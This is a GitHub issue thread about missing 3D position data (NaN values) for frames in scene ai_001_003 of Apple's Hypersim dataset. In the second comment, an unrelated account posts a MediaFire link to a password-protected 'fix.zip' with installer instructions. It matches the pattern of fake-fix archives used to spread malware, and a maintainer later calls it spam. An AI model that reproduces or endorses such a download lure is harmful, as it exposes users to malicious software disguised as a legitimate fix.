### ISSUE TITLE
Question for ai_001_003

### ISSUE THREAD

**Issue by SYSUykLin** [apple/ml-hypersim#77]
Hello
    I found that the frames in ai_001_003 have no 3D position at each pixel.  
```
scenes\ai_001_003\images\scene_cam_00_geometry_hdf5\frame.0000.position.hdf5
```

have many nan value, can not render depth map. Where could I find the 3D position of the frame? Thanks very much.
(I check the frame.0000.depth_meters.png，but they are normalized distances.)

**Comment by abdulhkeemGit** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SYSUykLin** [comment]
Thanks 

> Download https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file password: changeme In the installer menu, select "gcc."

Hello, Are u answer my question? I'm feeling a bit confused.

**Comment by SYSUykLin** [comment]
I understand, sorry for bother u.

**Comment by mikeroberts3000** [comment]
I'm sorry but I have no idea what you're trying to say in your question. Please slow down and explain your problem in more detail. Also, the link you posted appears to be spam so I'm going to delete it.
